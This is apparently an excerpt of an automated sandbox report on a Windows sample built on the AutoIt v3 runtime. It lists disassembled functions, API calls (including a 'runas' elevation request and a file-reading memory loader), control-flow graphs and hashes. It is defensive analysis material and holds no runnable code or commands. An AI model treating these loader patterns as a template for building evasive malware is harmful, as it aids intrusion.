                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00A42224), ref: 009C2C10
                        • ShellExecuteW.SHELL32(00000000,?,?,00A42224), ref: 009C2C17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                        • String ID: runas
                        • API String ID: 448630720-4000483414
                        • Opcode ID: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
                        • Instruction ID: 370878f3dff25d940e36025d373a077db1be4a1b3c62bd020ad7ea865eaffe4a
                        • Opcode Fuzzy Hash: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
                        • Instruction Fuzzy Hash: DD11D371608301AAC704FF70E851FBEB7A8ABD2751F44982DF082572A3CF358A4A8712
                        Function 009EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,009C5222), ref: 009EDBCE
                        • GetFileAttributesW.KERNELBASE(?), ref: 009EDBDD
                        • FindFirstFileW.KERNELBASE(?,?), ref: 009EDBEE
                        • FindClose.KERNEL32(00000000), ref: 009EDBFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirstlstrlen
                        • String ID:
                        • API String ID: 2695905019-0
                        • Opcode ID: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
                        • Instruction ID: b7efda5b5700189591479785b48ecacf29bd9b92956087609dffcb14d8393ccb
                        • Opcode Fuzzy Hash: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
                        • Instruction Fuzzy Hash: CBF0E530851910A7C221BBBCAD0D8EA376C9E01374B208702F8B6C20F0FBB45D66C6D6
                        Function 0098D730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 0098D807
                        • timeGetTime.WINMM ref: 0098DA07
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB28
                        • TranslateMessage.USER32(?), ref: 0098DB7B
                        • DispatchMessageW.USER32(?), ref: 0098DB89
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB9F
                        • Sleep.KERNEL32(0000000A), ref: 0098DBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                        • String ID:
                        • API String ID: 2189390790-0
                        • Opcode ID: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
                        • Instruction ID: a002d815eed88b5eeb78a3a03021ebedf2e478f3c03c678a0822c06b10fe9d2e
                        • Opcode Fuzzy Hash: ebc2cf361f772e695331cff012712215859b479a36605ba9b1fdf4b575888f95
                        • Instruction Fuzzy Hash: C042F13064A341EFD728EF24C844BAAB7E9BF96310F14891AE495873D1D775E845CB82
                        Function 00982CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00982D07
                        • RegisterClassExW.USER32(00000030), ref: 00982D31
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
                        • InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
                        • LoadIconW.USER32(000000A9), ref: 00982D85
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
                        • Instruction ID: c60bf2f2a135450e20b5f6d66597f7dd8ff4ebabee5801ab6c57bba46ed07f1e
                        • Opcode Fuzzy Hash: 3bd88cec7890456c743c8444193cd7171e8908d50e53988037d15c09cff8bd40
                        • Instruction Fuzzy Hash: 8921C0B5941318EFDB00DFE4E889BEDBBB8FB08725F00811AF511A62A0D7B14546CF95
                        Function 009C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 9c065b-9c068b call 9c042f 305 9c068d-9c0698 call 9af2c6 302->305 306 9c06a6-9c06b2 call 9b5221 302->306 311 9c069a-9c06a1 call 9af2d9 305->311 312 9c06cb-9c0714 call 9c039a 306->312 313 9c06b4-9c06c9 call 9af2c6 call 9af2d9 306->313 322 9c097d-9c0983 311->322 320 9c0716-9c071f 312->320 321 9c0781-9c078a GetFileType 312->321 313->311 325 9c0756-9c077c GetLastError call 9af2a3 320->325 326 9c0721-9c0725 320->326 327 9c078c-9c07bd GetLastError call 9af2a3 CloseHandle 321->327 328 9c07d3-9c07d6 321->328 325->311 326->325 331 9c0727-9c0754 call 9c039a 326->331 327->311 339 9c07c3-9c07ce call 9af2d9 327->339 329 9c07df-9c07e5 328->329 330 9c07d8-9c07dd 328->330 334 9c07e9-9c0837 call 9b516a 329->334 335 9c07e7 329->335 330->334 331->321 331->325 345 9c0839-9c0845 call 9c05ab 334->345 346 9c0847-9c086b call 9c014d 334->346 335->334 339->311 345->346 353 9c086f-9c0879 call 9b86ae 345->353 351 9c086d 346->351 352 9c087e-9c08c1 346->352 351->353 355 9c08e2-9c08f0 352->355 356 9c08c3-9c08c7 352->356 353->322 359 9c097b 355->359 360 9c08f6-9c08fa 355->360 356->355 358 9c08c9-9c08dd 356->358 358->355 359->322 360->359 361 9c08fc-9c092f CloseHandle call 9c039a 360->361 364 9c0931-9c095d GetLastError call 9af2a3 call 9b5333 361->364 365 9c0963-9c0977 361->365 364->365 365->359
                        APIs
                          • Part of subcall function 009C039A: CreateFileW.KERNELBASE(00000000,00000000,?,009C0704,?,?,00000000,?,009C0704,00000000,0000000C), ref: 009C03B7
                        • GetLastError.KERNEL32 ref: 009C076F
                        • __dosmaperr.LIBCMT ref: 009C0776
                        • GetFileType.KERNELBASE(00000000), ref: 009C0782
                        • GetLastError.KERNEL32 ref: 009C078C
                        • __dosmaperr.LIBCMT ref: 009C0795
                        • CloseHandle.KERNEL32(00000000), ref: 009C07B5
                        • CloseHandle.KERNEL32(?), ref: 009C08FF
                        • GetLastError.KERNEL32 ref: 009C0931
                        • __dosmaperr.LIBCMT ref: 009C0938
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
                        • Instruction ID: 213e79d321ebeb89e91e0c1b92901ae876ecf3b3907c2ce4436f78964ed8a885
                        • Opcode Fuzzy Hash: 42664477c55d7a3e4acedf21075d90dd8135f1137c68017e636fa588e8f1a614
                        • Instruction Fuzzy Hash: DDA1F332E042048FDF19EFA8DC51FAE7BA4AB86320F14415DF8259B291D7359917CB92
                        Function 0098344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78
                          • Part of subcall function 00983357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00983379
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0098356A
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009C318D
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009C31CE
                        • RegCloseKey.ADVAPI32(?), ref: 009C3210
                        • _wcslen.LIBCMT ref: 009C3277
                        • _wcslen.LIBCMT ref: 009C3286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 98802146-2727554177
                        • Opcode ID: 9245be15385991372ff08ab56fbf324405645efd502d10b7f4517ac65d664445
                        • Instruction ID: 1680ea194c9e0bd0468f87038b395808c9887f6f1f7ab168a878a77a97158090
                        • Opcode Fuzzy Hash: 9245be15385991372ff08ab56fbf324405645efd502d10b7f4517ac65d664445
                        • Instruction Fuzzy Hash: 1571A1714083019EC704EFA5DC81BABBBE8FFD6760F40482EF4459B261EB349A49CB52
                        Function 00982B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00982B8E
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00982B9D
                        • LoadIconW.USER32(00000063), ref: 00982BB3
                        • LoadIconW.USER32(000000A4), ref: 00982BC5
                        • LoadIconW.USER32(000000A2), ref: 00982BD7
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00982BEF
                        • RegisterClassExW.USER32(?), ref: 00982C40
                          • Part of subcall function 00982CD4: GetSysColorBrush.USER32(0000000F), ref: 00982D07
                          • Part of subcall function 00982CD4: RegisterClassExW.USER32(00000030), ref: 00982D31
                          • Part of subcall function 00982CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
                          • Part of subcall function 00982CD4: InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
                          • Part of subcall function 00982CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
                          • Part of subcall function 00982CD4: LoadIconW.USER32(000000A9), ref: 00982D85
                          • Part of subcall function 00982CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
                        • Instruction ID: badd881b661a347918ceca7c4d2a1c87f43f895edf7c6a77b40d8857cddc525c
                        • Opcode Fuzzy Hash: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
                        • Instruction Fuzzy Hash: 27214970E40318ABDB50DFE6EC69BA97FB4FB48B65F00415AE500AA6A0D3B10942CF94
                        Function 00983170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 443 983170-983185 444 9831e5-9831e7 443->444 445 983187-98318a 443->445 444->445 448 9831e9 444->448 446 9831eb 445->446 447 98318c-983193 445->447 452 9c2dfb-9c2e23 call 9818e2 call 99e499 446->452 453 9831f1-9831f6 446->453 449 983199-98319e 447->449 450 983265-98326d PostQuitMessage 447->450 451 9831d0-9831d8 DefWindowProcW 448->451 455 9c2e7c-9c2e90 call 9ebf30 449->455 456 9831a4-9831a8 449->456 458 983219-98321b 450->458 457 9831de-9831e4 451->457 487 9c2e28-9c2e2f 452->487 459 9831f8-9831fb 453->459 460 98321d-983244 SetTimer RegisterWindowMessageW 453->460 455->458 481 9c2e96 455->481 462 9c2e68-9c2e77 call 9ec161 456->462 463 9831ae-9831b3 456->463 458->457 466 9c2d9c-9c2d9f 459->466 467 983201-983214 KillTimer call 9830f2 call 983c50 459->467 460->458 464 983246-983251 CreatePopupMenu 460->464 462->458 470 9c2e4d-9c2e54 463->470 471 9831b9-9831be 463->471 464->458 473 9c2dd7-9c2df6 MoveWindow 466->473 474 9c2da1-9c2da5 466->474 467->458 470->451 484 9c2e5a-9c2e63 call 9e0ad7 470->484 479 983253-983263 call 98326f 471->479 480 9831c4-9831ca 471->480 473->458 482 9c2dc6-9c2dd2 SetFocus 474->482 483 9c2da7-9c2daa 474->483 479->458 480->451 480->487 481->451 482->458 483->480 488 9c2db0-9c2dc1 call 9818e2 483->488 484->451 487->451 492 9c2e35-9c2e48 call 9830f2 call 983837 487->492 488->458 492->451
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0098316A,?,?), ref: 009831D8
                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0098316A,?,?), ref: 00983204
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983227
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0098316A,?,?), ref: 00983232
                        • CreatePopupMenu.USER32 ref: 00983246
                        • PostQuitMessage.USER32(00000000), ref: 00983267
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
                        • Instruction ID: d68de94d3d924660a72d3310fa093bb9a38a956518a314667e8f53940aac95ee
                        • Opcode Fuzzy Hash: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
                        • Instruction Fuzzy Hash: 4A412435244304AADF15BBB89C1DBBD3A1DFB45F11F04C529F912863E1EBB49A4287A2
                        Function 009B8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 499 9b8d45-9b8d55 500 9b8d6f-9b8d71 499->500 501 9b8d57-9b8d6a call 9af2c6 call 9af2d9 499->501 503 9b90d9-9b90e6 call 9af2c6 call 9af2d9 500->503 504 9b8d77-9b8d7d 500->504 518 9b90f1 501->518 523 9b90ec call 9b27ec 503->523 504->503 507 9b8d83-9b8dae 504->507 507->503 510 9b8db4-9b8dbd 507->510 513 9b8dbf-9b8dd2 call 9af2c6 call 9af2d9 510->513 514 9b8dd7-9b8dd9 510->514 513->523 516 9b8ddf-9b8de3 514->516 517 9b90d5-9b90d7 514->517 516->517 522 9b8de9-9b8ded 516->522 520 9b90f4-9b90f9 517->520 518->520 522->513 525 9b8def-9b8e06 522->525 523->518 528 9b8e08-9b8e0b 525->528 529 9b8e23-9b8e2c 525->529 530 9b8e0d-9b8e13 528->530 531 9b8e15-9b8e1e 528->531 532 9b8e4a-9b8e54 529->532 533 9b8e2e-9b8e45 call 9af2c6 call 9af2d9 call 9b27ec 529->533 530->531 530->533 536 9b8ebf-9b8ed9 531->536 534 9b8e5b-9b8e79 call 9b3820 call 9b29c8 * 2 532->534 535 9b8e56-9b8e58 532->535 563 9b900c 533->563 572 9b8e7b-9b8e91 call 9af2d9 call 9af2c6 534->572 573 9b8e96-9b8ebc call 9b9424 534->573 535->534 538 9b8edf-9b8eef 536->538 539 9b8fad-9b8fb6 call 9bf89b 536->539 538->539 542 9b8ef5-9b8ef7 538->542 550 9b9029 539->550 551 9b8fb8-9b8fca 539->551 542->539 548 9b8efd-9b8f23 542->548 548->539 553 9b8f29-9b8f3c 548->553 559 9b902d-9b9045 ReadFile 550->559 551->550 555 9b8fcc-9b8fdb GetConsoleMode 551->555 553->539 557 9b8f3e-9b8f40 553->557 555->550 562 9b8fdd-9b8fe1 555->562 557->539 564 9b8f42-9b8f6d 557->564 560 9b90a1-9b90ac GetLastError 559->560 561 9b9047-9b904d 559->561 566 9b90ae-9b90c0 call 9af2d9 call 9af2c6 560->566 567 9b90c5-9b90c8 560->567 561->560 568 9b904f 561->568 562->559 569 9b8fe3-9b8ffd ReadConsoleW 562->569 570 9b900f-9b9019 call 9b29c8 563->570 564->539 571 9b8f6f-9b8f82 564->571 566->563 579 9b90ce-9b90d0 567->579 580 9b9005-9b900b call 9af2a3 567->580 575 9b9052-9b9064 568->575 577 9b8fff GetLastError 569->577 578 9b901e-9b9027 569->578 570->520 571->539 582 9b8f84-9b8f86 571->582 572->563 573->536 575->570 585 9b9066-9b906a 575->585 577->580 578->575 579->570 580->563 582->539 589 9b8f88-9b8fa8 582->589 592 9b906c-9b907c call 9b8a61 585->592 593 9b9083-9b908e 585->593 589->539 604 9b907f-9b9081 592->604 599 9b909a-9b909f call 9b88a1 593->599 600 9b9090 call 9b8bb1 593->600 605 9b9095-9b9098 599->605 600->605 604->570 605->604
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12c771a80df4127f05c9a9d93c4fe518448f62244f65879e25e22816f4004635
                        • Instruction ID: 29937a0ba75311bdb5150ea1142969c0dcc8a5850072ac8ff84a3cd5777b5bdf
                        • Opcode Fuzzy Hash: 12c771a80df4127f05c9a9d93c4fe518448f62244f65879e25e22816f4004635
                        • Instruction Fuzzy Hash: C7C1F474904349AFCB11EFE8D945BEEBBB8BF4A320F144199F914A7392C7349942CB61
                        Function 00962610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 607 962610-9626be call 960000 610 9626c5-9626eb call 963520 CreateFileW 607->610 613 9626f2-962702 610->613 614 9626ed 610->614 619 962704 613->619 620 962709-962723 VirtualAlloc 613->620 615 96283d-962841 614->615 617 962883-962886 615->617 618 962843-962847 615->618 621 962889-962890 617->621 622 962853-962857 618->622 623 962849-96284c 618->623 619->615 624 962725 620->624 625 96272a-962741 ReadFile 620->625 626 9628e5-9628fa 621->626 627 962892-96289d 621->627 628 962867-96286b 622->628 629 962859-962863 622->629 623->622 624->615 634 962743 625->634 635 962748-962788 VirtualAlloc 625->635 630 9628fc-962907 VirtualFree 626->630 631 96290a-962912 626->631 636 9628a1-9628ad 627->636 637 96289f 627->637 632 96286d-962877 628->632 633 96287b 628->633 629->628 630->631 632->633 633->617 634->615 638 96278f-9627aa call 963770 635->638 639 96278a 635->639 640 9628c1-9628cd 636->640 641 9628af-9628bf 636->641 637->626 647 9627b5-9627bf 638->647 639->615 644 9628cf-9628d8 640->644 645 9628da-9628e0 640->645 643 9628e3 641->643 643->621 644->643 645->643 648 9627f2-962806 call 963580 647->648 649 9627c1-9627f0 call 963770 647->649 655 96280a-96280e 648->655 656 962808 648->656 649->647 657 962810-962814 FindCloseChangeNotification 655->657 658 96281a-96281e 655->658 656->615 657->658 659 962820-96282b VirtualFree 658->659 660 96282e-962837 658->660 659->660 660->610 660->615
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009626E1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00962907
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                        • Instruction ID: cb081bc59f4a6d8b7e87cdb391cf14ad4436f825a165ca43736360e02110f3c9
                        • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                        • Instruction Fuzzy Hash: FEA1F574E00209EBDB14CFA4C894BEEBBB5FF48304F208559E505BB280D779AA81DF95
                        Function 00982C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 671 982c63-982cd3 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00982C91
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00982CB2
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CC6
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CCF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
                        • Instruction ID: 09ac8ab778c2f6351f0d8737dcec99fe8f2327c8aa8dfc1773919084b19c43c6
                        • Opcode Fuzzy Hash: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
                        • Instruction Fuzzy Hash: 26F03A795803907AEB708793AC1CFB72EBDE7C6F71F01401AF900AA5B0D2610842DAB0
                        Function 009623B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 786 9623b0-962509 call 960000 call 9622a0 CreateFileW 793 962510-962520 786->793 794 96250b 786->794 797 962527-962541 VirtualAlloc 793->797 798 962522 793->798 795 9625c0-9625c5 794->795 799 962545-96255c ReadFile 797->799 800 962543 797->800 798->795 801 962560-96259a call 9622e0 call 9612a0 799->801 802 96255e 799->802 800->795 807 9625b6-9625be ExitProcess 801->807 808 96259c-9625b1 call 962330 801->808 802->795 807->795 808->807
                        APIs
                          • Part of subcall function 009622A0: Sleep.KERNELBASE(000001F4), ref: 009622B1
